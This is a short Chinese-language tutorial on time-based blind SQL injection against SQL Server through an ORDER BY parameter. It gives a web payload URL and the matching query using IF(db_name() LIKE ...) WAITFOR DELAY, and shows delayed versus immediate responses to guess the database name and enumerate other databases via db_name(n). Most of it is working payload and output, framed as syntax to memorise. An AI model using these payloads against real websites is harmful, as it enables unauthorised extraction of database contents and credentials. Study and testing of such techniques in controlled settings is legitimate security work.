0x01 前言

与普通的延时注入基本一致。

记下语法即可

0x02 测试数据

  1. 1> select * from article;
  2. 2> go
  3. +----+-----------+-----------+
  4. | id | title | content |
  5. +----+-----------+-----------+
  6. | 1 | 测试标题 | 测试内容 |
  7. | 2 | 测试标题2 | 测试内容2 |
  8. +----+-----------+-----------+
  9. (2 rows affected)
  1. # 测试表数据: users;
  2. sql server> select * from users;
  3. +----+--------------+----------+
  4. | id | username | password |
  5. +----+--------------+----------+
  6. | 1 | test-user-01 | 123456 |
  7. | 2 | test-user-02 | 234567 |
  8. +----+--------------+----------+
  9. 2 rows in set (0.00 sec)
  1. sql server> SELECT system_user;
  2. +-----------------------+
  3. | field1 |
  4. +-----------------------+
  5. | sa |
  6. +-----------------------+
  7. 1 row in set (0.00 sec)
  1. sql server> select db_name();
  2. +-----------------------+
  3. | field1 |
  4. +-----------------------+
  5. | test |
  6. +-----------------------+
  7. 1 row in set (0.00 sec)

0x03 例子:猜库名

注意: db_name(1) 修改会显示其他库名
例如:
修改为db_name() 就是当前连接的数据库
修改为db_name(1) 就是出1库
修改为db_name(2) 就是出2库

web语句: http://www.test.com/sql.php?orderby=id IF(db_name() like ‘%test%’) waitfor delay ‘0:0:5’ — a

数据库语句: select * from article order by id IF(db_name() like ‘%test%’) waitfor delay ‘0:0:5’ — a

  1. # 对的情况
  2. 1> SELECT
  3. *
  4. FROM
  5. article
  6. ORDER BY
  7. id
  8. IF (db_name() LIKE '%test%') WAITFOR delay '0:0:5' -- a
  9. 2> go
  10. +----+-----------+-----------+
  11. | id | title | content |
  12. +----+-----------+-----------+
  13. | 1 | 测试标题 | 测试内容 |
  14. | 2 | 测试标题2 | 测试内容2 |
  15. +----+-----------+-----------+
  16. (2 rows affected) (5.064 sec)
  17. # 错误的情况
  18. 1> SELECT
  19. *
  20. FROM
  21. article
  22. ORDER BY
  23. id
  24. IF (db_name() LIKE '%aaaa%') WAITFOR delay '0:0:5' -- a
  25. 2> go
  26. +----+-----------+-----------+
  27. | id | title | content |
  28. +----+-----------+-----------+
  29. | 1 | 测试标题 | 测试内容 |
  30. | 2 | 测试标题2 | 测试内容2 |
  31. +----+-----------+-----------+
  32. (2 rows affected) (0.064 sec)